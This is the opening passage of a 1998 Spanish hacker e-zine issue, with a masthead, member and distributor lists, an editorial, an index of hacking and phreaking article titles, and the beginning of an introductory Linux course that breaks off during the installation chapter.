home *** CD-ROM | disk | FTP | other *** search
/ Power Hacker 2003 / Power_Hacker_2003.iso / E-zine / Magazines / jjf / jjf006.txt < prev    next >
Encoding:
Text File  |  2002-05-27  |  285.3 KB  |  7,261 lines

  1.              
  2.                         ╔────────────────────────────╗
  3.                         │                  ┌──────┐  │
  4.                         │                  │██████│  │
  5.                         │           ┌──────┤██┌───┘  │
  6.                         │    ┌──────┤██████│██└─┐    │
  7.                         │    │██████├─┐██┌─┤████│    │
  8.                         │    └─┐██┌─┴┐│██│J│██┌─┘    │
  9.                         │  ┌──┐│██│██└┘██│J│██│      │  
  10.                         │  │██└┘██│██████│F├──┘      │  
  11.                         │  │██████├──────┴─┘         │  
  12.                         │  └──────┘                  │  
  13.                         │   H A C K E R S  T E A M   │  
  14.                         │       J O U R N A L        │  
  15.                         ╠────────────────────────────╣        
  16.                         │     VOL. #2, Nº6, 1998.    │ 
  17.                         ╚────────────────────────────╝
  18.  
  19.  
  20.              "The most important design issue...
  21.  
  22.                      is the fact that Linux is supposed to be fun..."
  23.  
  24.                                                   Linus Torvalds.   
  25.  
  26. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=          
  27.  
  28.      Nota: - J.J.F. / HACKERS TEAM - no se hace responsable del mal uso
  29.            de la informacion aqui expuesta y tampoco tiene que estar
  30.            de acuerdo con lo que sus colaboradores opinen.
  31.            Tampoco esperamos que la gente use la informacion aqui expuesta
  32.            para hacer daño ya que tan solo es con fines didacticos.
  33.  
  34.      Recomendado el uso del editor del MS-DOS.
  35.  
  36. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=          
  37.  
  38.      #CURRENT MEMBERS :
  39.  
  40.      - CONDE VAMPIRO     - CODER  H/P/V    EDITOR
  41.      - MAC CRACK         - CODER  C        WEBMASTER
  42.      - Mr ELEKTRO        -        H/P      ADMIN
  43.      - SILENT MOTION     - CODER  H/P      ADMIN
  44.      - JUMPKNOWN         - CODER  H/P/V/C
  45.      - TASSLEHOFF        - CODER  H        CO-WEBMASTER
  46.  
  47.      #WEB OFICIAL :
  48.  
  49.      - http://www.angelfire.com/mi/JJFHackers
  50.      - http://jjfhackers.home.ml.org
  51.      - http://jjfhackers.hypermart.net
  52.  
  53.      #E-MAIL OFICIAL :
  54.  
  55.      - jjf_team@usa.net      
  56.  
  57.      #LLAVE PGP OFICIAL :
  58.      
  59.      -----BEGIN PGP PUBLIC KEY BLOCK-----
  60.      Version: 2.6.3ia
  61.  
  62.      mQCNAzVzXWwAAAEEALKaPtG7arRh4X0wUz16KP9/A6h4yhS5vcQ1QRx9TM7XV8w6
  63.      BcIJjz8AIeldDCO5Jix8R7Sb/FO/Uco0f5Rnpd98ObsHANr9wRDwGqUCWpOGVZ6+
  64.      ZhXEyfuDkzVl9MUxEVD1TyH08OGgdgRIKhCuPXY4C7W6Z+M0qVv0AX/CgliNAAUR
  65.      tCNKSkYgSGFja2VycyBUZWFtIDxqamZfdGVhbUB1c2EubmV0PokAlQMFEDVzXW1b
  66.      9AF/woJYjQEBlVwEAKgIdS0VA7qRuXMM7R4DtDcoz7We+vmHr/Mu+SvgsDkWRbBP
  67.      IHhI5OJxPRfShAvLtUXlGoCA0DuUDxoq4x9j/yDJQvhBwzPw53uwNWLs6+iI31jk
  68.      NCyv9h37hSfRTsRLq8hiQ3jqNWQO/i+O+c5RVr5gkSHdZF0lCvWI5NoSFnk0
  69.      =Wu00
  70.      -----END PGP PUBLIC KEY BLOCK-----
  71.  
  72.      #DISTRIBUIDORES OFICIALES DEL E-ZINE :
  73.  
  74.      - http://wakanda.islatortuga.com
  75.      - http://underhack.islatortuga.com
  76.      - http://www.redestb.es/~cheroky-1 
  77.      - http://members.xoom.com/baron_rojo/
  78.      - http://members.xoom.com/rifoxxx
  79.      - http://www.geocities.com/Colosseum/Sideline/9497/
  80.  
  81.      #MIEMBRO OFICIAL (web ring) DE :
  82.  
  83.      - Black Angels
  84.      - Spanish Underground Web Ring
  85.  
  86.      #COLABORADORES CON ESTE NUMERO :
  87.  
  88.      - LeTaL
  89.      - CORE SDI S.A.
  90.      - \Wend|g0
  91.      - ZeD (HaCk`S-wEb-RiNg)
  92.  
  93.      #SALUDOS :
  94.  
  95.      - Metalslug (Wakanda)           - NeonSurge (Rhino9)
  96.      - Schoddy Guy (Underhack)       - L0pth
  97.      - Cheroky                       - Ivan Arce (CORE SDI S.A.)
  98.      - Silicon Dragon                - Proyecto R
  99.      - Paseante (SET) 
  100.      - Dr Slump (oioio)
  101.  
  102. <────────────────────────────────────────────────────────────────────────────>
  103. <────────────────────────────────────────────────────────────────────────────>
  104. <────────────────────────────────────────────────────────────────────────────>
  105.  
  106.   - INDICE.                                  
  107.  
  108.     TITULO                                        AUTOR
  109.   ────────────\_______________________________/────────────
  110.  
  111.   * EDITORIAL ................................ J.J.F. / HACKERS TEAM
  112.   * INDICE DEL VOLUME Nº1 .................... J.J.F. / HACKERS TEAM 
  113.   * CURSO LINUX .............................. LETAL.
  114.   * HACK BASICO .............................. \WEND|G0.
  115.   * CURSO DE HACK VI ......................... CONDE VAMPIRO.
  116.   * CLONANDO MOVILES DEL CCC ................. J.J.F. / HACKERS TEAM
  117.   * ¿QUE SE PUEDE HACER EN EL IRC? ........... ZED.
  118.   * PHREACKING PARA NOVATOS .................. ZED.
  119.   * COMO TRUCAR EL GⁿINDOWS95 ................ ZED.
  120.   * ADVERTENCIA DE SEGURIDAD ................. CORE SDI S.A.
  121.   * EL LECTOR OPINA .......................... VARIOS.
  122.   * NOTICIAS UNDERGROUND ..................... J.J.F. / HACKERS TEAM
  123.  
  124. <────────────────────────────────────────────────────────────────────────────>
  125. ██████████████████████████████████████████████████████████████████████████████
  126. <────────────────────────────────────────────────────────────────────────────>
  127.  
  128.   -------------
  129.   │ EDITORIAL │
  130.   -------------
  131.  
  132.         Pues quien lo diria, que este ezine comienza su segundo volumen y
  133.   por supuesto nos anima a seguir mejorando no solo el ezine, si no tambien
  134.   el web y muchas mas cosas que ya os iremos contando, que a lo largo de
  135.   este año seran muchas. Destacar que empezamos el segundo volumen con muy
  136.   buena calidad. Una de las cosas a destacar es la bienvenida de nuevos
  137.   miembros en J.J.F. / HACKERS TEAM, que son los siguientes : Mr. Elektro,
  138.   Silent Motion, JumpKnown y Tasslehoff.
  139.  
  140.         Una pequeña reseña, ya que tenemos mas distribuidores oficiales, en el
  141.   cual podreis encontrar este ezine y tambien otros, los url's son los
  142.   siguientes: http://members.xoom.com/rifoxxx y
  143.   http://www.geocities.com/Colosseum/Sideline/9497/
  144.  
  145.         Bueno, ya se acabo el verano, para algunos mal y para otros bien,
  146.   como siempre ahi toda clase de opiniones. Desde aqui quiero hacer una
  147.   pequeña reseña, ¿ me pregunto donde esta toda esa gente que decia que
  148.   quiere colaborar con articulos. ? Ya que todavia no hemos visto nada de
  149.   nada, a ver si para futuros numeros vemos vuestros nicks por aqui :)
  150.   Como ya hemos dicho muchas veces puedes escribir sobre H/C/P/V, seguridad
  151.   o de cualquier cosa que creas interesante. Por supuesto tambien nos
  152.   gustaria los puntos de vista de los administradores, agentes de la autoridad
  153.   y de las grandes corporaciones. Este es un ezine para todos los gustos.
  154.   Y POR FAVOR!!!!!!!! Si quieres escribir no envies un mail antes dicendo:
  155.   "Hola, os interesa un articulo de ...", lo que tienes que hacer es
  156.   ESCRIBIRLO y DESPUES NOS LO ENVIAS, asi de simple, okis!!!!
  157.  
  158.         Por una vez en la vida sabemos cuando saldra el numero 7 :), por
  159.   eso avisamos de antemano para que envieis vuestros articulos. El numero 7
  160.   esta fijado para principios de diciembre, por lo que teneis tiempo de
  161.   sobra. ¿ Porque a principios de diciembre ?, la respuesta en el numero 7 :)
  162.  
  163.         Hemos visto que en muchos sitios, tanto en web's como en articulos,
  164.   la gente no nos nombra correctamente y eso ahi que corregirlo, por lo que
  165.   hacemos hincapie en que para referiros al grupo lo hagais de la siguiente
  166.   manera : J.J.F. / HACKERS TEAM, y para referiros al ezine, pues de esta
  167.   otra: J.J.F. / HACKERS TEAM JOURNAL. Que son las formas correctas :)
  168.  
  169.         En este numero hemos sufrido un pequeño retraso debido a varios
  170.   factores :) tambien decir que ayer fue el cumple de Conde Vampiro (21/9)
  171.   y el jueves es el de Tasslehoff (24/9) por lo que este semana estamos
  172.   de fiesta :))) Dentro de una semana, podreis encontrar en nuestro website
  173.   varias fotos de nuestras aventuras nocturnas que seguro que os encantaran,
  174.   por otro lado, AVISO A LOS DISTRUIBUIDORES OFICIALES: decir que hemos
  175.   puesto 2 logos que cualquiera que distribuya nuestro ezine le rogamos
  176.   que ponga en su website y ademas nos envie su url para ponerlo en el
  177.   ezine.
  178.  
  179.         Desde aqui, - J.J.F. / HACKERS TEAM -, mandamos un apoyo a SET por los
  180.   problemas sufridos, referente a unos logs de un determinado kanal de IRC
  181.   de la red Hispanos y que sigan tirando para adelante :)
  182.  
  183.         Desde aqui damos las gracias al señor Ivan Arce, por dejanos
  184.   publicar los avisos de la empresa CORE, al igual que tambien queremos
  185.   anunciaros, para los que no lo sepan, la mejor lista de seguridad en
  186.   castellano que se puede encontrar, la cual el señor Arce es el moderador y
  187.   para suscribirse haced lo siguiente, enviar mail a majordomo@secnet.com
  188.   con el texto "subscribe seg-l [su-email]" en el cuerpo del mensaje y ya
  189.   estareis suscritos.
  190.  
  191.         Tambien damos las gracias a los señores Sergi Bueno y Javier Pedreira
  192.   "Wicho" de las revistas EN LA RED e IWORLD, respectivamente, por dejarnos
  193.   expresar nuestras opiniones y poder colaborar. Durante este año hemos
  194.   salido en las siguientes revistas :
  195.  
  196.   - EN LA RED, 2.03.
  197.  
  198.   - IWORLD, Año II, Numero 7. Julio-Agosto 1998.
  199.  
  200.   - Jumping, Año IV, 2 Epoca, Nª20, Julio-Agosto 1998.
  201.  
  202.   A todos ellos en gran o menor medida gracias.
  203.  
  204.                                                    - J.J.F. / HACKERS TEAM -
  205.  
  206. <────────────────────────────────────────────────────────────────────────────>
  207. ██████████████████████████████████████████████████████████████████████████████
  208. <────────────────────────────────────────────────────────────────────────────>
  209.  
  210.                     █═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═█
  211.                     │                                     ║
  212.                     ║        INDICE DEL VOLUME Nº1        │
  213.                     │                                     ║
  214.                     ║  - J.J.F. / HACKERS TEAM JOURNAL -  │
  215.                     │                                     ║
  216.                     █─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─█
  217.  
  218.         Pues aqui os recordamos los articulos que han pasado por el Primer
  219.   Volumen del - J.J.F. / HACKERS TEAM JOURNAL -. A la vez que tambien damos
  220.   las gracias a todas aquellas personas que han hecho posible este ezine.
  221.  
  222.   -> Nº1
  223.  
  224.     TITULO                                        AUTOR
  225.   ------------________________________________---------------
  226.   
  227.   * EDITORIAL ________________________________ J.J.F. / HACKERS TEAM
  228.   * TECNICAS HACKER __________________________ VANDALS.
  229.   * CURSO DE HACK I __________________________ CONDE VAMPIRO.
  230.   * STACK OVERFLOW EXPLOiTS __________________ IPgh0st.
  231.   * CONFERENCIA DE LA GC EN EL SIMO __________ NOBODY.
  232.   * TEST HACKER ______________________________ MAC CRACK BISHOP.
  233.   * NOTICIAS UNDERGROUND _____________________ CONDE VAMPIRO.
  234.  
  235.   -> Nº2
  236.  
  237.     TITULO                                        AUTOR
  238.   ────────────\_______________________________/────────────
  239.  
  240.   * EDITORIAL ................................ J.J.F. / HACKERS TEAM
  241.   * IP-SPOOFING DEMISTIFICADO ................ IPgh0st.
  242.   * LAND ATTACK .............................. NOBODY.
  243.   * CURSO DE HACK II ......................... CONDE VAMPIRO.
  244.   * MOVIL DEFECTUOSO ERICSSON GA-628 ......... JSR.
  245.   * INTRODUCCION AL HACK ..................... VIRUX.
  246.   * HACKERS HALL OF FAME ..................... BISHO.
  247.   * NOTICIAS UNDERGROUND ..................... J.J.F. / HACKERS TEAM
  248.  
  249.   -> Nº3
  250.  
  251.     TITULO                                        AUTOR
  252.   ────────────\_______________________________/────────────
  253.  
  254.   * EDITORIAL ................................ J.J.F. / HACKERS TEAM
  255.   * MIEDO A LOS ARTICULOS: NO, GRACIAS ....... CONDE VAMPIRO.
  256.   * QUE ES UN HACKER Y QUE ES UN CRACKER ..... BISHO.
  257.   * LOS OUTDIALS EN INTERNET ................. NOBODY.
  258.   * UN LOG DE UN SERVIDOR .................... ANONIMO.
  259.   * CURSO DE HACK III ........................ CONDE VAMPIRO.
  260.   * USO DE SAMBA EN LINUX/UNIX COMO
  261.     SUSTITUTO DEL NBTSTAT .................... ENIF.
  262.   * ESTADISTICA DE LOS HACKERS EN 1997 ....... J.J.F. / HACKERS TEAM
  263.   * DOCUMENTO SOBRE LOS PERMISOS DE ARCHIVOS
  264.     Y DIRECTORIOS PARA SISTEMAS UNIX ......... KOJI.
  265.   * INTRODUCCION AL HACKING v2.0 I ........... DAEMON.
  266.   * EL LECTOR OPINA .......................... VARIOS.
  267.   * NOTICIAS UNDERGROUND ..................... J.J.F. / HACKERS TEAM
  268.  
  269.   -> Nº4
  270.  
  271.     TITULO                                        AUTOR
  272.   ────────────\_______________________________/────────────
  273.  
  274.   * EDITORIAL ................................ J.J.F. / HACKERS TEAM
  275.   * HACK WITH JAVA ........................... NOBODY.
  276.   * UN POKILLO DE PHREAKING .................. DRSLUMP.    
  277.   * CURSO DE HACK IV ......................... CONDE VAMPIRO.
  278.   * COMO HACKEAR UN TAMATGOTCHI .............. BISHO.
  279.   * MANIFIESTO DE UN HACKER NOVATO ........... SILICON DRAGON.  
  280.   * INTRODUCCION AL HACKING v2.0 II .......... DAEMON.
  281.   * EL LECTOR OPINA .......................... VARIOS.
  282.   * NOTICIAS UNDERGROUND ..................... J.J.F. / HACKERS TEAM
  283.  
  284.   -> Nº5
  285.  
  286.     TITULO                                        AUTOR
  287.   ────────────\_______________________________/────────────
  288.  
  289.   * EDITORIAL ................................ J.J.F. / HACKERS TEAM
  290.   * HACK RSH (RESTRICTED SHELL) .............. NOBODY.
  291.   * HERRAMIENTAS PARA USUARIOS DE LINUX
  292.     (PARANOICOS?) ............................ CUBIKICE.
  293.   * CURSO DE HACK V .......................... CONDE VAMPIRO.
  294.   * COMO CRACKEAR NORTON CRASHGUARD
  295.     DELUXE 3.0 ............................... ESTADO PORCINO.
  296.   * UN POCO DE CULTURA: LIBROS ............... MAC CRACK
  297.   * EL LECTOR OPINA .......................... VARIOS.
  298.   * NOTICIAS UNDERGROUND ..................... J.J.F. / HACKERS TEAM
  299.  
  300.         Y ahora un saludo a las siguientes personas que de alguna forma han
  301.   participado con - J.J.F. / HACKERS TEAM -.
  302.  
  303.   -> Saludos :
  304.  
  305.   - VANDALS  
  306.   - IPgh0st  (Underhack)
  307.   - NOBODY
  308.   - Virux (@pOkalypSYS)
  309.   - Bisho
  310.   - Jsr
  311.   - Metalslug (Wakanda)
  312.   - Koji
  313.   - Cesar
  314.   - Enif (Oioio)
  315.   - Daemon  
  316.   - Schoddy Guy (Underhack)
  317.   - DrSlump (OiOiO's Band)
  318.   - Silicon Dragon
  319.   - Cheroky
  320.   - CubikIce
  321.   - Estado Porcino (WKT)
  322.   - Paseante (SET) 
  323.   - Profesor Falken (SET)
  324.  
  325. <────────────────────────────────────────────────────────────────────────────>
  326. ██████████████████████████████████████████████████████████████████████████████
  327. <────────────────────────────────────────────────────────────────────────────>
  328.  
  329.                             ---------------
  330.                            -< CURSO LINUX >-
  331.                             ---------------
  332.  
  333.   INDICE TEMATICO
  334.   ---------------
  335.  
  336.   #CAPITULO I: INTRODUCCION.
  337.   Linux, la mejor alternativa, caracteristicas.
  338.  
  339.   #CAPITULO II : INSTALACION.
  340.   Requerimientos para la instalacion, Preparacion, Instalacion.
  341.  
  342.   #CAPITULO III: KERNEL
  343.   ¿Que es el Kernel, ¿Para que recompilarlo?, ¿Que se necesita?,
  344.   Configuracion, Makefile, Compilacion, Instalacion.
  345.  
  346.   #CAPITULO IV: USO
  347.   Conceptos basicos preliminares, Shells, Directorios, comandos basicos.
  348.  
  349.   #CAPITULO V: TAREAS Y PROCESOS
  350.   Control de Tareas, Tareas y procesos, Primer plano y Segundo plano,
  351.   Envio a segundo plano y eliminacion procesos, Detencion o parada y
  352.   relanzamiento de tareas.
  353.  
  354.   #CAPITULO VI: USUARIOS Administracion de Usuarios. Como agregar un usuario,
  355.   Como borrar un usuario.
  356.  
  357.   #CAPITULO VII: SEGURIDAD BASICA
  358.   Permisos de Ficheros, Conceptos de permisos de ficheros, Interpretando los
  359.   permisos de ficheros, Dependencias, Cambiando permisos, Grupos,
  360.  
  361.   #GLOSARIO. 
  362.  
  363.         #Capitulo I
  364.  
  365.         Linux, la mejor alternativa.
  366.  
  367.         Vamos a hablar un poco acerca de Sistemas Operativos. Mucho Usuarios
  368.   especialmente los novatos creen que el mundo esta hecho solo de Windows 95
  369.   y que el DOS fue su antepasado antediluviano, en realidad Windows 95 es una
  370.   nueva cara bonita del DOS. Pero la realidad nos dice que no existe un solo
  371.   S.O. tenemos varias decenas de ellos, por ejemplo antes de DOS fue CPM del
  372.   que heredamos entre otras cosas los archivos .COM, también existen SPARC,
  373.   OS400, PICK, SYSTEM, OASIS, y una gran variedad de derivados de UNIX, entre
  374.   ellos SOLARIS, AIX, XENIX, USB, SUN OS y LINUX.
  375.         La aparicion de W95 a creado adeptos y adversos, pero tambien a dado
  376.   origen a un debate acerca de los sistemas operativos que creo le hace
  377.   mucho bien a la informatica.
  378.         Para contribuir con este debate imaginemonos el Sistema Operativo
  379.   ideal. Seguramente no todos estaremos de acuerdo en todas las sus
  380.   caracteristicas pero busquemos por lo menos diez puntos en comun.
  381.  
  382.         1. CODIGO: Si nuestra PC actualmente tiene un microprocesador de 32
  383.   bits, el Sistema deber  ser "completamente" de 32 bits. Es mas si en el
  384.   futuro tenemos PCs con procesadores de 64 bits, tambien el S.O. deber
  385.   estar compilado en 64 bits. Mas aun, seria mejor que el sistema operativo
  386.   se provea con sus fuentes en el lenguaje mas portable de cuantos existen
  387.   asi lo podemos compilar en la maquina que se nos antoje.
  388.  
  389.         2. RED: Actualmente se impone cada vez con mayor firmeza el uso de
  390.   redes ya sean locales, Intranets e Internet. De manera que nuestro sistema
  391.   operativo deber estar concebido como de red desde sus origenes. Existen
  392.   muchos sistemas de red, debemos entonces pensar cual es la mejor opcion
  393.   teniendo en cuanta varios factores, la popularidad, la trayectoria, la
  394.   compatibilidad, la fiabilidad, etc. Tenemos que tener en cuenta tambien
  395.   cual es la escala mundial el estandar en Internet. La respuesta es una
  396.   sola, UNIX. Asi que nuestro S.O. deber estar basado en UNIX.
  397.  
  398.         3. INTEFRCACE CON EL USUARIO: Con la aparicion de las MAC, se impuso
  399.   un nuevo estandar que luego fue incorporado por casi todos los S.O. Las
  400.   Interfaces Graficas. De manera que nuestro S.O. tiene que tener una. Es mas
  401.   seria mejor que tenga muchas y que el usuario pueda elegir si quiere que
  402.   esta se vea y comporte como Win95, como Solaris, como las no tan populares
  403.   NEXT, una propia de UNIX como ser MOTIFF, o de muchas otras formas algunas
  404.   totalmente ineditas y originales.
  405.  
  406.         4. MULTITAREA: El cerebro del hombre es multitarea por naturaleza,
  407.   asi que la principal extension artificial del mismo (la PC) deber tener un
  408.   sistema operativo multitarea. Pero multitarea real, de tipo cooperativo,
  409.   que garantice la posibilidad de ejecucion de todas las aplicaciones
  410.   activas.
  411.  
  412.         5. MULTIUSUARIO: La PC no es como un cepillo de dientes de uso
  413.   personal exclusivamente es mas bien como una esponja o cepillo de baño que
  414.   los usan toda la familia de manera que nuestro S.O. ideal deber tener
  415.   capacidad de administrar en forma segura la informacion y aplicaciones de
  416.   cada uno de sus usuarios pudiendo estos tener terminales propias o bien
  417.   usar una sola maquina.
  418.  
  419.         6. MULTIMEDIA: Nuestro S.O. tendra que soportar todas las
  420.   capacidades multimedia actuales y las que vendran deberan tener una rapida
  421.   asimilacion.
  422.  
  423.         7. APLICACIONES: Sin una fuerte biblioteca de aplicaciones un S.O.
  424.   esta destinado a perecer. De manera que tendremos que contar con una
  425.   amplisima coleccion de aplicaciones que cubran todos los rubros tales como
  426.   Graficos, Animaciones, Musica, Autoedicion, Procesamiento de textos,
  427.   Gestion administrativa y comercial. No nos olvidemos que como el S.O. de
  428.   suministra con sus fuentes es logico que las aplicaciones tambien lo hagan.
  429.   Como nos basamos en UNIX podremos aprovechar todo el software desarrollado
  430.   para esa plataforma.
  431.  
  432.         8. OTRAS PLATAFORMAS: Las aplicaciones de otras plataformas tales
  433.   como DOS, Windows o Mac, tienen que correr con emuladores.
  434.  
  435.         9. DESARROLLO: Es importante que nuestro S.O. tenga un amplio surtido
  436.   de compiladores y librerias, tales como C, C++, PASCAL, BASIC, SMALLTALK,
  437.   EIFFEL, CLIPPER, PERL, FORTRAM, ADA, MODULA 2, ETC.
  438.  
  439.         10. Y como si todo esto fuera poco pidamos que este soportado por un
  440.   cuerpo de diseñadores y programadores expertos de todo el mundo.
  441.  
  442.         11. Una de yapa. Que todo absolutamente todo sea GRATIS.
  443.  
  444.         ¿Que tal? No parece un sueño llegar a contar algun dia con un S.O.
  445.   como este. Pero este sueño no es mio, esta quimera le pertenece a un
  446.   finlandes llamado Linus Torvalds y fue precisamente el quien dio los
  447.   primero pasos para hacerlo realidad y asi nace LINUX un S.O. con
  448.   mayusculas que no tiene nada que envidiarle a nadie. Actualmente en
  449.   cualquier casa de venta de Shareware se los puede conseguir al precio que
  450.   solo cubre los gastos de distribucion, por ejemplo tenemos paquetes que
  451.   cuentan con Cuatro o Cinco Distribuciones distintas ademas una completa
  452.   recopilacion de aplicaciones compiladores y librerias a menos de $30 en 6 o
  453.   mas CDs. Tambien esta disponible en Internet en todas sus distribuciones.
  454.   Son de recomendar las paginas WWW.LINUX.ORG, WWW.SUNSITE.UNC.EDU.
  455.  
  456.         Caracteristicas de Linux
  457.  
  458.         * Multitarea real: La multitarea es una virtud codiciada por muchos
  459.   SS.OO. pero lograda por muy pocos, casi todos los SS.OO. que dicen ser
  460.   multitarea lo son a medias ya que usan el concepto de Multitarea
  461.   Cooperativa que cede el microprocesador a otros procesos (aplicaciones)
  462.   solo cuando la aplicacion que se encuentra en primer plano cede el tiempo
  463.   de ejecucion y recursos, en cambio la multitarea preferente que usa Linux
  464.   administra los recursos garantizados que todos los procesos en ejecucion
  465.   incluidos los que corren en background tengan su tiempo de procesador.
  466.  
  467.         * Multiusuario: Dado que como ya vimos Linux es un S.O. multitarea
  468.   es de esperar que tambien sea Multiusuario, es decir que permita que
  469.   personas distintas puedan acceder a su potencial compartiendo los recursos
  470.   que el Administrador del Sistema (SysOp, root) le asigne de acuerdo a su
  471.   jerarquia, dandole ademas a cada uno la privacidad y proteccion necesaria.
  472.   Cada usuario tendra asignado un espacio de disco, aplicaciones, Shells,
  473.   impresoras, etc. lo que junto a la ID (nombre con que el usuario se
  474.   registra) y el password (palabra clave) se denomina Cuentas de Usuarios, en
  475.   el momento en que un usuario desde una terminal remota entra en el sistema
  476.   (login) se dice que comienza una sesion es decir que el micro le garantiza
  477.   recursos y tiempo de microprocesador.
  478.  
  479.         * G.N.U.: Si bien Linus Torvalds es el titular del derecho de autor
  480.   de LINUX, todo, incluido el kernel con sus fuentes estan bajo licencia GNU.
  481.   Esta licencia permite que todos el software desarrollado bajo este concepto
  482.   sea de libre distribucion ofreciendo asi al publico en general software de
  483.   calidad sin que los programadores pierdan sus derechos de autor dejando
  484.   abierta la posibilidad que cualquier otro programador pueda ampliar o
  485.   modificar el programa.
  486.  
  487.         * Librerias Compartidas: Gracias a esta caracteristicas no es
  488.   necesario que las rutinas contenidas en librerias estandar se carguen mas
  489.   de una ves en memoria, ya que cualquier programa que se encuentre en tiempo
  490.   de ejecucion puede acceder a ellas, de esta manera los binarios
  491.   (ejecutables) de Linux son de menor tamaño permitiendo ahorrar espacio en
  492.   disco y memoria.
  493.  
  494.         * Carga por Demanda:  En la mayoria de los SS.OO. Cada nuevo proceso
  495.   (aplicación) que se lanza demanda memoria y recursos, pero cuando se
  496.   termina la RAM automaticamente se comienza a hacer uso de la memoria
  497.   virtual, esto no ocurre en Linux puesto que su administracion inteligente
  498.   de memoria pasa a memoria virtual cualquier proceso que se encuentre activo
  499.   pero no en uso garantizando de esta manera RAM para la aplicaciones activas
  500.   y en uso.
  501.  
  502.         * Administracion de Memoria: Todos los procesos tienen garantizada
  503.   una zona protegida de memoria para su ejecucion, sin que el mal
  504.   funcionamiento de una aplicacion cuelgue a todo el equipo.
  505.  
  506.         * Redes TCP/IP: Para conectarse a Internet por ejemplo en Windows
  507.   necesitamos instalar el protocolo TCP/IP. Esto no ocurre en Linux ya que al
  508.   ser TCP un protocolo propio de los sistemas UNIX luego heredado por Linux
  509.   contamos directamente con el en el kernel, incluso la aparición de Java no
  510.   paso inadvertida para Linux de manera que fue inmediatamente absorbida y ya
  511.   se cuenta con soporte tanto para JavaScripts como para applets Java los
  512.   cuales se pueden ejecutar como software nativo al estar incluido en el
  513.   Kernel.
  514.  
  515.         * Aplicaciones: Gracias a la licencia GNU el caudal de aplicaciones
  516.   disponibles para Linux crece a un ritmo vertiginoso especialmente en
  517.   Internet. Podemos decir que existe software para practicamente todas las
  518.   necesidades. La unica limitacion para los usuarios de habla hispana es el
  519.   idioma ya que es muy dificil encontrar software traducido o de origen
  520.   latino para Linux.
  521.  
  522.         * Desarrollo: Linux es un S.O. echo y pensado por programadores para
  523.   programadores, a partir de esto podemos encontrar compiladores o
  524.   interpretes para todos los lenguajes existentes. Algunos ejemplos son los
  525.   siguientes: C (propio de los sistemas UNIX), C++, ADA, PASCAL, PERL,
  526.   MODULA 2, FORTRAN, PHYTON, EIFFEL, BASIC, RPG, SMALLTALK, COBOL, ASSEMBLER,
  527.   OBERON, ETC.
  528.  
  529.         #Capitulo II
  530.  
  531.         Requerimientos de hardware para la instalacion
  532.  
  533.         * CPU: Su computadora debe tener un procesador 386, 486, Pentium, o
  534.   Pentium Pro, o uno de los clones de estos procesadores hechos por
  535.   fabricantes como Cyrix, AMD, TI, IBM, etc. Si su procesador tiene letras
  536.   como "sx", "sl", "slc", etc. despues del numero, como en "386sx", es
  537.   correcto. El sistema no funcionar  en un 286 o en procesadores inferiores.
  538.  
  539.         * Bus de E/S: Su computadora debe utilizar el bus ISA, EISA, PCI, o
  540.   VL. El bus VL se conoce tambien como VESA Local Bus o VLB. Las computadoras
  541.   que tienen PCI o VLB generalmente tienen tambien ranuras ISA o EISA.
  542.  
  543.         * RAM y Disco Rigido: Debe tener al menos 4MB de RAM aunque es
  544.   recomendable no menos de 16MB y 40MB de disco duro, pero si usted quiere
  545.   instalarlo todo necesitar  300MB o mas. Las interfaces de disco que emulan
  546.   la interfaz de disco "AT" que se llaman habitualmente MFM, RLL, IDE, o ATA
  547.   estan soportados. Las controladoras de disco SCSI de diversos fabricantes
  548.   estan soportadas.
  549.  
  550.         * Unidad de disquete: Debe tener una unidad de disquete de 1.2MB o
  551.   1.44MB como unidad a: en el sistema en el que instale Linux. Si tiene tanto
  552.   una unidad de 1.2MB como una de 1.44MB, configure el hardware para que la
  553.   unidad de 1.44MB sea la a:.
  554.  
  555.         * MPC: Como casi todas las distribuciones de Linux vienen en CD-ROM
  556.   necesitaremos una lectora que puede ser IDE, SCSI o con norma propia como
  557.   alguna Creative o Mitusmi.
  558.  
  559.         * Placa de video: Aunque soporta desde una hercules, es recomendable
  560.   usar una placa de video compatible con VGA para el terminal de la consola.
  561.   Practicamente cualquier tarjeta grafica moderna es compatible con VGA. CGA,
  562.   MDA, o HGA pueden funcionar correctamente para texto, pero no funcionar 
  563.   con el Xwindows.
  564.  
  565.         * Otro Hardware: Linux soporta una gran variedad de dispositivos como
  566.   son: ratones, impresoras, escaners, modems, tarjetas de red, etc. Sin
  567.   embargo, no se requiere ninguno de estos dispositivos durante la
  568.   instalacion del sistema.
  569.  
  570.         Preparacion:
  571.  
  572.         Antes de comenzar, asegurese de que realiza una copia de seguridad de
  573.   todos los ficheros que hay en su sistema. 
  574.  
  575.         Informacion que necesitar :
  576.  
  577.   * Norma del CD-ROM
  578.  
  579.   * Norma del HD
  580.  
  581.   * Especificaciones de su placa de RED (Modelo, Puerto E/S, IRQ)
  582.  
  583.   * Especificaciones de su raton, modem, teclado, zona horaria.
  584.  
  585.   * Frecuencia de barrido horizontal y vertical de su monitor, marca, modelo,
  586.     chipset, RAM y clocks de su placa de video.
  587.  
  588.   * Tipo de servidor grafico segun su placa de video.
  589.  
  590.   * El nombre de la maquina (posiblemente pueda decidir esto por su cuenta).
  591.  
  592.   * El nombre del dominio.
  593.  
  594.   * La direccion IP de su computadora.
  595.  
  596.   * La mascara de red (netmask) que ha de usarse con su red.
  597.  
  598.   * La direccion IP de su red.
  599.  
  600.   * La direccion de difusion (broadcast) que ha de usar en su red.
  601.  
  602.   * La direccion IP de la pasarela (gateway) del sistema por omision hacia la
  603.     cual hay que encaminarse, si su red tiene una pasarela.
  604.  
  605.   * El sistema de su red que debe usar como servidor DNS (`Domain Name
  606.     Server', servidor de nombres de dominio).
  607.  
  608.         Antes de proceder a la instalacion en si, debemos realizar una serie
  609.   de preparativos en nuestro equipo
  610.  
  611.         Preparacion del HD. Si no ha particionado aun su rigido para Linux y
  612.   memoria virtual deber recurrir a la aplicacion shareware FIPS que
  613.   encontrara en cualquier distribucion de Linux, pero antes de usarla
  614.   asegurese de que desfragmento su HD. FIPS le permitir ahora particionar su
  615.   rigido sin que pierda la informacion contenida. Dejaremos de esta manera
  616.   suficientes megas libres de su HD para luego cuando la instalacion lo
